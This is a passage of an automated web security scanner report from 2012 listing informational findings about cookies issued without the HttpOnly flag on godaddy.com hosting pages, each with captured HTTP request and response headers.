4.63. http://www.godaddy.com/hosting/content/website_builder_features.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /hosting/content/website_builder_features.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hosting/content/website_builder_features.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=s5qphyjui1hegoczfo2dk55z; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=s5qphyjui1hegoczfo2dk55z; path=/; HttpOnly
Set-Cookie: SplitValue1=9; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:58:58 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/hosting/content/website_builder_features.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=9; domain=godaddy.com; path=/
Set-Cookie: preferences1=_sid=; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:58:57 GMT
Connection: close
Content-Length: 19252

{"Html":"\r\n\u003cstyle type=\"text/css\"\u003e\r\n.cicon_sprt {background: transparent url(\u0027http://img1.wsimg.com/fos/base/1/43024_wst_icons.png\u0027) top left no-repeat; width:75px; height:75
...[SNIP]...

4.64. http://www.godaddy.com/hosting/content/website_builder_how_it_works.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /hosting/content/website_builder_how_it_works.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hosting/content/website_builder_how_it_works.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=kgyzwkv5ed350anwsvhmzzf5; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=kgyzwkv5ed350anwsvhmzzf5; path=/; HttpOnly
Set-Cookie: SplitValue1=44; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:58:57 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/hosting/content/website_builder_how_it_works.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=44; domain=godaddy.com; path=/
Set-Cookie: preferences1=_sid=; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:58:57 GMT
Connection: close
Content-Length: 9472

{"Html":"\r\n\u003ctable class=\"t12\" width=\"960\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"\u003e\r\n \u003ctr\u003e\r\n \u003ctd width=\"1\" bgcolor=\"#dadada\" class=\"s1 w1\"\u003e&nb
...[SNIP]...

4.65. http://www.godaddy.com/hosting/grid/popups/prove-it-4gh.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /hosting/grid/popups/prove-it-4gh.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hosting/grid/popups/prove-it-4gh.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=n4jdj5hitie4dwg2zdxb1i1b; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=n4jdj5hitie4dwg2zdxb1i1b; path=/; HttpOnly
Set-Cookie: SplitValue1=45; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:58:53 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/hosting/grid/popups/prove-it-4gh.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=45; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:58:52 GMT
Connection: close
Content-Length: 12857


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><link r
...[SNIP]...

4.66. http://www.godaddy.com/hosting/grid/popups/why-you-need-4gh.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /hosting/grid/popups/why-you-need-4gh.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hosting/grid/popups/why-you-need-4gh.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=ph3bf2pmsiwztd4114kqdvxb; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=ph3bf2pmsiwztd4114kqdvxb; path=/; HttpOnly
Set-Cookie: SplitValue1=71; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:58:54 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/hosting/grid/popups/why-you-need-4gh.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=71; domain=godaddy.com; path=/
Set-Cookie: preferences1=_sid=; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:58:53 GMT
Connection: close
Content-Length: 10050


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><link r
...[SNIP]...

4.67. http://www.godaddy.com/hosting/hosting.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /hosting/hosting.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hosting/hosting.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=fvodn0mfrre2zmbtygc4udg3; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=fvodn0mfrre2zmbtygc4udg3; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:58:51 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:58:51 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:58:51 GMT; path=/
Set-Cookie: SplitValue1=21; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:58:51 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/hosting/hosting.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=21; domain=godaddy.com; path=/
Set-Cookie: GoogleADServicesgoogleadwords=gibdbchcdbtbzakfeabgjhocjilbabki; domain=godaddy.com; expires=Sat, 05-Mar-2022 01:58:51 GMT; path=/
Date: Mon, 05 Mar 2012 01:58:51 GMT
Connection: close
Content-Length: 265687


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><sc
...[SNIP]...

4.68. http://www.godaddy.com/hosting/jsoncontent/grid-hosting-technology.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /hosting/jsoncontent/grid-hosting-technology.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hosting/jsoncontent/grid-hosting-technology.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=jsdcgvcgiupyc3rfdmufzfjv; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=jsdcgvcgiupyc3rfdmufzfjv; path=/; HttpOnly
Set-Cookie: SplitValue1=66; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:58:55 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/hosting/jsoncontent/grid-hosting-technology.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=66; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:58:54 GMT
Connection: close
Content-Length: 10064


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><link r
...[SNIP]...

4.69. http://www.godaddy.com/hosting/popups/wst-flashintros-quicktour-widget.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /hosting/popups/wst-flashintros-quicktour-widget.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hosting/popups/wst-flashintros-quicktour-widget.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=if0d1gfqu1gtdazhrv3arva4; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=if0d1gfqu1gtdazhrv3arva4; path=/; HttpOnly
Set-Cookie: SplitValue1=87; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:58:57 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/hosting/popups/wst-flashintros-quicktour-widget.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=87; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:58:56 GMT
Connection: close
Content-Length: 10021

{"Html":"\r\n \u003ccenter\u003e\r\n \u003cdiv id=\"cds-slides-tour\"\u003e\r\n \u003ctable cellspacing=\"0\" cellpadding=\"0\" border=\"0\"\u003e\r\n \u003ctr\u003e\r\n
...[SNIP]...

4.70. http://www.godaddy.com/hosting/popups/wst-quicktour-widget.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /hosting/popups/wst-quicktour-widget.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hosting/popups/wst-quicktour-widget.aspx?ci=44038&callback=popUpFill&targetDivId=quickTourDiv&popUpFill=jsonp1330911991097&_=1330912001996 HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
Accept: text/javascript, application/javascript, */*
Referer: http://www.godaddy.com/hosting/website-builder.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ws5jw4vh5tuzq2dphfi4us5a; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; SplitValue1=75; flag1=cflag=us; currencypopin1=cdisplaypopin=false; GoogleADServicesgoogleadwordshome=zbnczeofsfcgdhzeqcxgcadeafyilatc; pathway=221039fb-1ef3-4a9c-9888-ebefb84fcda3; HPBackground=Danica2; MemPDC1=ljrecdtffbugaahgraqdyjybtizayfne; MemPDCLoc1=net; PCSplitValue1=1; GoogleADServicesgoogleadwordssearch=hbjjxbcaiaffadneicfbdagjqgiiggnd; BlueLithium_domainsearch=keydqgeemhudugljzexamaxfhjofnevf; BlueLithium=ldubxiuhpfmhtbbiyjmelhwaahghdbma; GoogleADServicesgooglessl=zbaitefefbwexbmflgoethnixhqjvich; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=14; actioncount=; app_pathway=; visitor=vid=221039fb-1ef3-4a9c-9888-ebefb84fcda3; adc1=US; currency1=potableSourceStr=USD; traffic=cookies=1&referrer=http://www.godaddy.com/ssl/ssl-certificates.aspx&sitename=www.godaddy.com&page=/ssl/ssl-certificates.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=%26hpGoogleStatic%3d1&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=221039fb-1ef3-4a9c-9888-ebefb84fcda3&referringdomain=&split=75; BlueLithium_ssl=chsduddeifteyewceiebbfsifczdjdig

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/hosting/website-builder.aspx&sitename=www.godaddy.com&page=/hosting/popups/wst-quicktour-widget.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=ci=44038&callback=popUpFill&targetDivId=quickTourDiv&popUpFill=jsonp1330911991097&_=1330912001996%26hpGoogleStatic%3d1&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=221039fb-1ef3-4a9c-9888-ebefb84fcda3&referringdomain=&split=75; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:55:37 GMT
Content-Length: 13419

popUpFill({"Html":"\r\n \u003ccenter\u003e\r\n \u003cdiv id=\"cds-slides-tour\"\u003e\r\n \u003ctable cellspacing=\"0\" cellpadding=\"0\" border=\"0\"\u003e\r\n \u003ctr\u003e\
...[SNIP]...

4.71. http://www.godaddy.com/hosting/popups/wst-sample-sites.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /hosting/popups/wst-sample-sites.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hosting/popups/wst-sample-sites.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=p3qsefi0r000zp55rzhdw5mk; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=p3qsefi0r000zp55rzhdw5mk; path=/; HttpOnly
Set-Cookie: SplitValue1=51; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:58:56 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/hosting/popups/wst-sample-sites.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=51; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:58:55 GMT
Connection: close
Content-Length: 14691


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><link r
...[SNIP]...

4.72. http://www.godaddy.com/hosting/web-hosting.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /hosting/web-hosting.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hosting/web-hosting.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=qrkddcczjfehgahecvhxbgue; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=qrkddcczjfehgahecvhxbgue; path=/; HttpOnly
Set-Cookie: SplitValue1=26; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:40:58 GMT; path=/
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:58 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:58 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:58 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/hosting/web-hosting.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=26; domain=godaddy.com; path=/
Set-Cookie: BlueLithium=phidojrcgjbeyjgbxhlgdjsifbhbnarh; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:40:57 GMT
Connection: close
Content-Length: 213912


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><ti
...[SNIP]...

4.73. http://www.godaddy.com/hosting/web-hosting.aspx/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /hosting/web-hosting.aspx/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hosting/web-hosting.aspx/ HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=y0leoaykjvaj1yv0kg1cuafj; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=y0leoaykjvaj1yv0kg1cuafj; path=/; HttpOnly
Set-Cookie: SplitValue1=24; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:59:07 GMT; path=/
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:07 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:07 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:59:07 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/hosting/web-hosting.aspx/&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=24; domain=godaddy.com; path=/
Set-Cookie: BlueLithium=ahwhfdcfajkbqajjscfeahqimfpfdhcg; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:59:07 GMT
Connection: close
Content-Length: 213915


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><ti
...[SNIP]...

4.74. http://www.godaddy.com/hosting/website-builder.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /hosting/website-builder.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /hosting/website-builder.aspx HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
Content-Length: 32
Cache-Control: max-age=0
Origin: http://www.godaddy.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.godaddy.com/hosting/website-builder.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ws5jw4vh5tuzq2dphfi4us5a; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; SplitValue1=75; flag1=cflag=us; currencypopin1=cdisplaypopin=false; GoogleADServicesgoogleadwordshome=zbnczeofsfcgdhzeqcxgcadeafyilatc; pathway=221039fb-1ef3-4a9c-9888-ebefb84fcda3; HPBackground=Danica2; MemPDC1=ljrecdtffbugaahgraqdyjybtizayfne; MemPDCLoc1=net; PCSplitValue1=1; GoogleADServicesgoogleadwordssearch=hbjjxbcaiaffadneicfbdagjqgiiggnd; BlueLithium_domainsearch=keydqgeemhudugljzexamaxfhjofnevf; BlueLithium=ldubxiuhpfmhtbbiyjmelhwaahghdbma; GoogleADServicesgooglessl=zbaitefefbwexbmflgoethnixhqjvich; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=14; actioncount=; app_pathway=; visitor=vid=221039fb-1ef3-4a9c-9888-ebefb84fcda3; BlueLithium_ssl=chsduddeifteyewceiebbfsifczdjdig; adc1=US; currency1=potableSourceStr=USD; traffic=cookies=1&referrer=http://www.godaddy.com/hosting/website-builder.aspx&sitename=www.godaddy.com&page=/hosting/popups/wst-quicktour-widget.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=ci=44038&callback=popUpFill&targetDivId=quickTourDiv&popUpFill=jsonp1330911991097&_=1330912001996%26hpGoogleStatic%3d1&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=221039fb-1ef3-4a9c-9888-ebefb84fcda3&referringdomain=&split=75

validate=addtoCart&selection=p12

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.godaddy.com/domains/searchreview.aspx?pd=yes
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:55:39 GMT; path=/
Set-Cookie: ShopperId1=kchdeenifijadeddjacdqaxekbveychi; domain=godaddy.com; expires=Sat, 05-Mar-2022 01:55:39 GMT; path=/
Date: Mon, 05 Mar 2012 01:55:38 GMT
Content-Length: 172

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.godaddy.com/domains/searchreview.aspx?pd=yes">here</a>.</h2>
</body></html>

4.75. http://www.godaddy.com/hosting/website-builder.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /hosting/website-builder.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hosting/website-builder.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=5jg3h32madmr4zsz35egpekd; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=5jg3h32madmr4zsz35egpekd; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:53 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:53 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:53 GMT; path=/
Set-Cookie: SplitValue1=67; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:40:53 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/hosting/website-builder.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=67; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:40:52 GMT
Connection: close
Content-Length: 139000


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

4.76. http://www.godaddy.com/hosting/website-builder.aspx/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /hosting/website-builder.aspx/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hosting/website-builder.aspx/ HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=jm3y5okwp1jwrxgxuokpylo4; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=jm3y5okwp1jwrxgxuokpylo4; path=/; HttpOnly
